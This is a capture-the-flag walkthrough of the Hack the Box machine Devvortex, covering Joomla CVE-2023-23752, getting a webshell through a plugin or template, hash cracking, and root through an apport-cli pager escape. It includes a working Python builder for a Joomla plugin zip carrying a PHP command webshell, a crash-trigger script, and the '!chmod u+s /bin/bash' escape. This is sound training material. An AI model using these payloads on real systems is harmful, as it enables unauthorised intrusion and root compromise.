In this post, I would like to share a walkthrough of the Devvortex machine from Hack the Box.
Devvortex is rated an Easy machine on Hack the Box.
What will you gain from the Devvortex machine?
For the user flag, you will need to expose the list of users along with the database connection password, and use this information to gain entry to the admin panel. Within the admin panel, I’ll demonstrate two ways of obtaining code execution: by altering a template and by uploading a webshell plugin. Once we have a shell, I’ll pivot to the next user by cracking their password hash from the database.
As for the root flag, you need to abuse a pager escape in apport-cli: when the tool is run with sudo, the pager it spawns runs as root and lets us drop to a root shell.
For those who want to learn or improve their cybersecurity skills, especially red teaming and blue teaming, you can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me.
The Academy link can be found at https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259vvv
Information Gathering on Devvortex Machine
Once we have started the VPN connection, which requires downloading the connection pack from Hack the Box, we can begin with an nmap scan.
┌─[darknite@parrot]─[~/Documents/htb/Devvortex]
└──╼ $ nmap -sC -sV 10.10.11.242 -oA inital
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-26 08:43 EST
Nmap scan report for 10.10.11.242
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.76 seconds
┌─[darknite@parrot]─[~/Documents/htb/Devvortex]
└──╼ $
Let’s open the website in a browser.
Sadly, nothing on the main site looks useful to abuse.
Therefore, let’s enumerate directories with gobuster, but it finds little worth investigating.
Next, let’s look for subdomains with gobuster, which finds exactly one: dev.devvortex.htb (add it to /etc/hosts before visiting it).
The screenshot above shows the website interface for the subdomain we just found.
Let’s look at the response in Burp Suite; there is nothing of interest there either.
After analysing the website interface thoroughly, there is nothing we can use for the next step, so let’s enumerate its directories with gobuster. The output shows an /administrator directory that we can open in the browser.
Let’s open the /administrator directory, which presents us with a login page. If you look closely, it is the Joomla administrator interface.
Nothing useful is stored in the /modules/ directory.
From my experience with Joomla before, there should be a robots.txt file on the site.
The screenshot above shows the default Joomla robots.txt, which confirms the CMS and lets us work out the Joomla version in use.
CVE-2023-23752 Vulnerability
As a result, let’s research that Joomla version.
There is a GitHub page, linked here, whose exploit we can use later on.
We can use GitHub – Pushkarup/CVE-2023-23752: Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7) for the next step.
Let’s clone it manually onto our machine.
Running the script against the target gives us the Joomla user list together with the database username and password: the vulnerable versions hand out the application configuration through the API without any authentication.
The leaked database password also gets us into the administrator dashboard, so let’s log in with those credentials.
The screenshot above shows the exploit output.
Let’s start our listener.
Let’s create an empty HTML file to sit alongside the PHP payload.
We should zip those files into one archive.
On the System dashboard, we need to find somewhere to upload the malicious archive.
As a result, we should look at the plugins installed in Joomla; the extension installer is where a new plugin package is uploaded.
We are required to upload the malicious archive into the Joomla application.
At last, we have successfully uploaded the malicious archive.
After a while, we should receive the reverse shell connection back on our listener.
Another method to get the www-data shell
Just as a WordPress theme can be edited for code execution, we can abuse a template in the Joomla application.
However, only one template is available on this Joomla install.
In the template’s error.php file, we add the malicious PHP command that will give us a reverse shell back to our machine.
We trigger the malicious command by requesting the error.php page.
At last, we also obtain a shell this way.
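Both methods above come down to getting one PHP file onto the web root, either packaged as a plugin or pasted into the template's error.php. The following is an added example of mine, not the author's upload and not Joomla's own code, that builds the plugin archive for the first method: a manifest XML, the PHP file and the empty index.html the walkthrough mentions, zipped the way Joomla's extension installer expects. The plugin name "shell" and the manifest fields are hypothetical. The payload is a plain webshell that runs the cmd query parameter; the same PHP snippet is what you would drop into error.php for the second method, and a reverse-shell one-liner is passed as cmd to get the callback.

```python
"""Package a minimal Joomla 4 plugin whose PHP file is a webshell, for upload via the extension installer.

Added example for this walkthrough (plugin name and manifest fields are hypothetical).
"""
import io
import sys
import xml.etree.ElementTree as ET
import zipfile

PLUGIN_NAME = "shell"    # hypothetical element name; Joomla installs it under plugins/<group>/<name>/
PLUGIN_GROUP = "system"  # system plugins are the simplest group to install

# The webshell. The same snippet is what you would paste into a template's error.php for the second method.
WEBSHELL_PHP = """<?php
if (isset($_GET['cmd'])) {
    header('Content-Type: text/plain');
    system($_GET['cmd']);
}
"""


def manifest_xml(name: str, group: str) -> str:
    """Installer manifest; <filename plugin="..."> marks which PHP file Joomla treats as the plugin."""
    return f"""<?xml version="1.0" encoding="utf-8"?>
<extension type="plugin" group="{group}" method="upgrade" version="4.0">
    <name>plg_{group}_{name}</name>
    <author>example</author>
    <version>1.0.0</version>
    <description>Example plugin package</description>
    <files>
        <filename plugin="{name}">{name}.php</filename>
        <filename>index.html</filename>
    </files>
</extension>
"""


def build_plugin_zip(name: str = PLUGIN_NAME, group: str = PLUGIN_GROUP, payload: str = WEBSHELL_PHP) -> bytes:
    """Return the zip archive the installer expects: manifest, plugin PHP file and an empty index.html."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr(f"{name}.xml", manifest_xml(name, group))
        archive.writestr(f"{name}.php", payload)
        archive.writestr("index.html", "")  # the empty HTML file from the walkthrough; Joomla keeps one per directory
    return buffer.getvalue()


def inspect_package(data: bytes) -> dict:
    """Re-open the archive, check the manifest parses and points at the PHP file, and return a summary."""
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        entries = sorted(archive.namelist())
        manifest_name = next(entry for entry in entries if entry.endswith(".xml"))
        root = ET.fromstring(archive.read(manifest_name))
    plugin_file = root.find("./files/filename[@plugin]")
    group = root.get("group")
    element = plugin_file.get("plugin")
    return {
        "entries": entries,
        "type": root.get("type"),
        "group": group,
        "plugin_file": plugin_file.text,
        # Where the file lands once installed, and how the shell is invoked.
        "webshell_url": f"/plugins/{group}/{element}/{plugin_file.text}?cmd=id",
    }


if __name__ == "__main__":
    out = sys.argv[1] if len(sys.argv) > 1 else f"{PLUGIN_NAME}.zip"
    package = build_plugin_zip()
    with open(out, "wb") as handle:
        handle.write(package)
    summary = inspect_package(package)
    print(f"wrote {out} with {summary['entries']}; after install, request {summary['webshell_url']}")
```

Upload the resulting zip through the extension installer, then request the webshell URL printed at the end with cmd set to your reverse-shell command (URL-encoded) while the listener is waiting. Remember to uninstall the plugin or revert error.php once you are done with the box.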
Enumerate the MySQL database on the machine
Let’s access the database with the credentials we leaked earlier.
We should be presented with the databases as shown above.
The screenshot above shows the tables that can be investigated further.
The raw output is not very readable.
After a while of analysis, we manage to obtain the password hashes stored in the Joomla users table.
We should copy the hashes we found into a file.
Let’s start our hashcat process. Joomla stores bcrypt hashes (they begin with $2y$), which is hashcat mode 3200.
Finally, we have recovered the password for logan.
Let’s log in as logan over SSH, or with pwncat-cs, using the recovered password.
Boom! We have successfully accessed the machine as logan.
We can read the user flag by running the “cat user.txt” command.
Escalate to Root Privileges Access
As usual, checking what logan is allowed to run with sudo reveals the binary we can abuse in the next stage: apport-cli.
CVE-2023–26604 Vulnerability
The screenshot above shows the source code of the apport-cli script.
Let’s execute the binary.
The picture above shows the help output for the binary.
We can also find the version of the binary, which tells us whether it is affected by CVE-2023-26604.
First, we check the crash directory (/var/crash), in which only two crash files are stored.
We need a fresh crash to work with, so we start a sleep process in the background.
Therefore, let’s kill the process we just started with a signal that produces a core dump (for example SIGSEGV), so that apport records it.
There is one new crash file after that step.
Let’s open the new crash file with apport-cli run through sudo.
Let’s try to execute a simple and basic command as shown above: when we choose to view the report, apport-cli opens it in a pager, and a line beginning with ! runs a shell command from inside that pager.
As a result, we managed to execute commands as root through the crash file, because the pager inherits the root privileges from sudo.
We can use this to make bash a SUID binary, which gives us a root shell.
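The non-interactive part of the root step, as an added example of mine rather than the author's commands: it starts a throwaway sleep process, sends it SIGSEGV so apport writes a report, waits for that report to appear under /var/crash (apport names it after the executable path with / replaced by _, followed by the crashing user's uid), and prints the sudo apport-cli invocation to run next. It assumes an Ubuntu host with apport enabled; the pager escape itself stays interactive (choose V to view the report, then type a ! command in the pager), so it is only described in the comments.

```python
"""Generate an apport crash report on demand and build the apport-cli invocation used to open it.

Added example for this walkthrough, not the author's commands. Assumes Ubuntu with apport enabled.
"""
import os
import signal
import subprocess
import time
from typing import List, Optional

CRASH_DIR = "/var/crash"


def crash_report_path(executable_path: str, uid: int, crash_dir: str = CRASH_DIR) -> str:
    """apport names a report after the executable's absolute path with '/' turned into '_', then .<uid>.crash."""
    return os.path.join(crash_dir, executable_path.replace("/", "_") + f".{uid}.crash")


def trigger_crash(executable: str = "/bin/sleep", timeout: float = 15.0) -> Optional[str]:
    """Start a throwaway process and SIGSEGV it; the kernel hands the core to apport, which writes the report.

    Returns the report path once it appears, or None if apport did not produce one in time.
    """
    target = os.path.realpath(executable)  # on merged-/usr systems /bin/sleep is really /usr/bin/sleep
    process = subprocess.Popen([target, "300"])
    time.sleep(0.5)  # give the child time to exec before we kill it
    process.send_signal(signal.SIGSEGV)
    process.wait()
    expected = crash_report_path(target, os.getuid())
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if os.path.exists(expected):
            return expected
        time.sleep(0.5)
    return None


def apport_cli_command(report_path: str) -> List[str]:
    """apport-cli run through sudo. Choosing V (view report) opens the report in a pager that runs as root;
    a line starting with ! in that pager (for example !chmod u+s /bin/bash) is executed as root."""
    return ["sudo", "apport-cli", "-c", report_path]


if __name__ == "__main__":
    report = trigger_crash()
    if report is None:
        print("no crash report appeared; is the apport service running?")
    else:
        print("new report:", report)
        print("now run:", " ".join(apport_cli_command(report)))
```

If no report appears, apport may be disabled on the host; the walkthrough's crash directory already held two reports, which shows it was active on this machine. Once the command printed at the end is running, the rest is the interactive pager escape described above.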
We can read the root flag by running the “cat root.txt” command.